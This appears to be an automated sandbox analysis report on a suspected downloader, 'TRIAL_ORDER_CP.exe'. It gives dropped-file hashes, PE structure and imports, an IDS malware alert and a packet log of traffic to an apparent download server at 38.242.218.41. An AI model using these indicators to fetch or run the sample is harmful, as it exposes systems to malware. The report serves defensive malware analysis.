                                        SSDEEP:6:3CUzIrGx4igCDYUuTjAtLGafWWl2iEOQkAtj/jLsTzOwJT4HCALn:3CCF4igCDYA5Ga+Wl2iEOTAJryO8MHCu
                                        MD5:EF6FDEDE5EA8DBEF391FEC35BE82A5FC
                                        SHA1:6C88262F78E8B11651EEB6534F09C65CD0A8F8BB
                                        SHA-256:37B39724FD3B7FE48E1D65DA1A69BF4DBF809F34C67BAC7C4DA13F93DA9BE856
                                        SHA-512:5FB53ADEADB7C464A13EEECE64ADD35F972425D55447FFB84A277689BA3F4D5861A43B2883CB0744F98F164F2802C567F9969F777B98CE4609D28A64ED1101FD
                                        Malicious:false
                                        Preview:skydestigens dilettanist defmrkers,drmmene sprometrets taklingens crokinole ligegladestes,ultraremuneration dkketallerkners uncustomed filoversigterne.atomize koncentrationsevnens arthropodal epilepsis vakuums stabelvis lnregulering,catv skrivemaskinebordenes skydningerne.solanin godkendelsens gasogene.
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):109610
                                        Entropy (8bit):2.6617579967489884
                                        Encrypted:false
                                        SSDEEP:1536:FgW5xMFGTVJF+21miQeKdFwpo0Vv0Qs5w110FkLpTEO7:vrsD6
                                        MD5:88A948F41E25F333CA29D74A18275335
                                        SHA1:352EDF6A66228CBE4161DBB104CE3F515613E285
                                        SHA-256:6DD15FC1E2E38CDE46A9D729A3390A20548E91BF4EE72441EF72DE008ABF279F
                                        SHA-512:C1189DF2FB7DACEB3B5C31FFED37D8DD3479CE6E1E553EC9846AE114079FC368A509BFA04FED721FACB04E6327C8AD2D1D1A7E566C8EC67815C5F84E84E6C49E
                                        Malicious:false
Preview:
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):301874
                                        Entropy (8bit):7.574773877850153
                                        Encrypted:false
                                        SSDEEP:6144:CUAmWaqUDpmX7a2orEMWgWLkuoJguBP0YI:YmxqsccIsJguBPtI
                                        MD5:254D4AABCCC8E28A203C152E4826A86A
                                        SHA1:25B5F293B8A76CC17836D26924B42385F4BD6584
                                        SHA-256:6034CCD53FF6AAB2850028AED103E16BBF997A780AD74C93AE9AFE188536DC3E
                                        SHA-512:0CCD5D3E8F51A2675112F673A6D102A1072B74726C0AE43FC0F95A7D7864011B2F8956D4EFF9DC6CA51997F6E41930467A55FFC048165D811C86B8D572FC1DDD
                                        Malicious:false
                                        Preview:.uu.m....//////............,..ooo..QQ....W.......}}........~...............d......}}...'..........................r...s.f.JJ.z...............B.(..88............666...).....}}.....BBB.....p...{.....OO.....................R............P..{{{{...M.......h........ ......++...2...}...ww...b...........ii.......................```..................999......SSS............ZZZ...II...............................///.,........................................v.....EE........v...-.............................................>>........_..............................6.UU........................@.......bbbb....).............*...n.7777....[..d.........J...........?.....z.....!........::..cc..........I.........mmmm......................................}....III......KKKKKK.................d.GGG..............L...*....GGGG.P.qq.........g.....!!.......................[..E. ..............................[...U............E..V......r......................................p...UU...A.b......................===...
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):5632
                                        Entropy (8bit):3.817430038996001
                                        Encrypted:false
                                        SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                        MD5:549EE11198143574F4D9953198A09FE8
                                        SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                        SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                        SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious, Browse
                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):12288
                                        Entropy (8bit):5.804946284177748
                                        Encrypted:false
                                        SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                        MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                        SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                        SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                        SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: Thermo Fisher RFQ_TFS-1805.xls, Detection: malicious, Browse
                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                        • Filename: FedEx Shipping Confirmation.exe, Detection: malicious, Browse
                                        • Filename: IMG_00991ORDER_FILES.exe, Detection: malicious, Browse
                                        • Filename: SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx, Detection: malicious, Browse
                                        • Filename: AKgHw6grDP.exe, Detection: malicious, Browse
                                        • Filename: AKgHw6grDP.exe, Detection: malicious, Browse
                                        • Filename: PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):4096
                                        Entropy (8bit):3.3415738744933092
                                        Encrypted:false
                                        SSDEEP:48:qK5HC+J4apHT1wH8l9QcXygHg0ZShMmj3jk6TbGr7X:5QiRzuHOXTA0H6jk6nGr7X
                                        MD5:F8B6DD1F9620BE4EF2AD1E81FB6B79FA
                                        SHA1:F06C8C8650335BACE41C8DBE73307CBE4E61B3B1
                                        SHA-256:A921CC9CC4AF332BE96186D60D2539CB413DFA44CFD73E85687F9338505FF85E
                                        SHA-512:F15811088ECDE4CD0C038DB2C278B7214E41728E382B25C65C2EB491BC0379C075841398E8C99E8CCEBA8BE7E8342BC69D35836EBE9B12EBEBFF48D01D5FA61A
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):9728
                                        Entropy (8bit):5.157714967617029
                                        Encrypted:false
                                        SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
                                        MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
                                        SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
                                        SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
                                        SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....C.f...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7168
                                        Entropy (8bit):5.295306975422517
                                        Encrypted:false
                                        SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
                                        MD5:11092C1D3FBB449A60695C44F9F3D183
                                        SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
                                        SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
                                        SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):6.813518603963732
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:TRIAL_ORDER_CP.exe
                                        File size:1'014'480 bytes
                                        MD5:5a14d64b70fc7106cb6c14be1aaa7482
                                        SHA1:0612c6f0f1aa18f6e96de3d7ae39193981d9bb95
                                        SHA256:bdd5b953bef085550bb5891e8d3c7248b5b16fcbba1bb26e2be18c4801d1a98e
                                        SHA512:9f8075010e5f4b8a4dcac7a4fda9a947459ffaf29c34a454a0f94c749703f28d734b39b2a6359de6a1a067d0551927cfecc39610427277ef26c4eb83fe67def7
                                        SSDEEP:12288:RGUeTvuO1BJdtGrY8dMLMankl6QQGMi7B1mSwIhCjVn:RGPB4Y8d2JKpQWB1mSlCjV
                                        TLSH:28259EA3E44CA2A1D4E98F73E20B76B705371DB595560013A2D1BF273AF9C23467392B
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....
                                        Icon Hash:d96236594b352501
                                        Entrypoint:0x40352f
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                        Instruction
                                        sub esp, 000003F8h
                                        push ebp
                                        push esi
                                        push edi
                                        push 00000020h
                                        pop edi
                                        xor ebp, ebp
                                        push 00008001h
                                        mov dword ptr [esp+20h], ebp
                                        mov dword ptr [esp+18h], 0040A2D8h
                                        mov dword ptr [esp+14h], ebp
                                        call dword ptr [004080A4h]
                                        mov esi, dword ptr [004080A8h]
                                        lea eax, dword ptr [esp+34h]
                                        push eax
                                        mov dword ptr [esp+4Ch], ebp
                                        mov dword ptr [esp+0000014Ch], ebp
                                        mov dword ptr [esp+00000150h], ebp
                                        mov dword ptr [esp+38h], 0000011Ch
                                        call esi
                                        test eax, eax
                                        jne 00007F48392309BAh
                                        lea eax, dword ptr [esp+34h]
                                        mov dword ptr [esp+34h], 00000114h
                                        push eax
                                        call esi
                                        mov ax, word ptr [esp+48h]
                                        mov ecx, dword ptr [esp+62h]
                                        sub ax, 00000053h
                                        add ecx, FFFFFFD0h
                                        neg ax
                                        sbb eax, eax
                                        mov byte ptr [esp+0000014Eh], 00000004h
                                        not eax
                                        and eax, ecx
                                        mov word ptr [esp+00000148h], ax
                                        cmp dword ptr [esp+38h], 0Ah
                                        jnc 00007F4839230988h
                                        and word ptr [esp+42h], 0000h
                                        mov eax, dword ptr [esp+40h]
                                        movzx ecx, byte ptr [esp+3Ch]
                                        mov dword ptr [007A8318h], eax
                                        xor eax, eax
                                        mov ah, byte ptr [esp+38h]
                                        movzx eax, ax
                                        or eax, ecx
                                        xor ecx, ecx
                                        mov ch, byte ptr [esp+00000148h]
                                        movzx ecx, cx
                                        shl eax, 10h
                                        or eax, ecx
                                        movzx ecx, byte ptr [esp+0000004Eh]
                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3d7000 | 0x6a4e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x66d1 | 0x6800 | 1cb1571d2754df0a2b7df66b1b8d9089 | False | 0.6727388822115384 | data | 6.4708065613184305 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1358 | 0x1400 | f0b500ff912dda10f31f36da3efc8a1e | False | 0.44296875 | data | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39e378 | 0x600 | 92e7d2d711bd61815cb4cc2d30d795b1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a9000 | 0x2e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3d7000 | 0x6a4e0 | 0x6a600 | 50c6a3b5a9739b53779ab9f1abcff9d3 | False | 0.20903716216216217 | data | 4.214291608698191 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3d73b8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.16116445246619523
RT_ICON | 0x4193e0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.22898675026617768
RT_ICON | 0x429c08 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3017658187933572
RT_ICON | 0x4330b0 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.32804990757855823
RT_ICON | 0x438538 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3040269248937175
RT_ICON | 0x43c760 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.38724066390041495
RT_ICON | 0x43ed08 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.42120075046904315
RT_ICON | 0x43fdb0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.43688524590163935
RT_ICON | 0x440738 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5859929078014184
RT_DIALOG | 0x440ba0 | 0xb8 | data | English | United States | 0.6467391304347826
RT_DIALOG | 0x440c58 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x440da0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x440ea0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x440fc0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x441020 | 0x84 | data | English | United States | 0.7196969696969697
RT_VERSION | 0x4410a8 | 0x1a8 | data | English | United States | 0.5660377358490566
RT_MANIFEST | 0x441250 | 0x290 | XML 1.0 document, ASCII text, with very long lines (656), with no line terminators | English | United States | 0.5625
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-28T12:25:21.088617+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 12:25:20.714098930 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:20.898994923 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:20.899276972 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:20.899656057 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.084317923 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088315964 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088330984 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088432074 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088445902 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088458061 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088469028 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088499069 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088614941 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088617086 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.088617086 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.088645935 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088658094 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.088787079 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.088787079 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.088787079 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.088787079 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.273863077 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.273886919 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.273906946 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.273930073 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274199009 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.274199009 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.274241924 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274271965 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274331093 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274388075 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274460077 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274481058 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274498940 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274517059 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274521112 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.274521112 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.274534941 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274547100 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.274744987 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.274920940 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274950981 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274971962 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.274991035 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.275011063 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.275031090 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.275049925 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.275088072 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.275423050 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.459445953 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.459574938 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.459671021 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.459752083 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.459757090 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.459858894 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.459928036 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.459983110 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460041046 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460068941 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460068941 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460095882 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460159063 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460216999 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460216999 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460309982 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
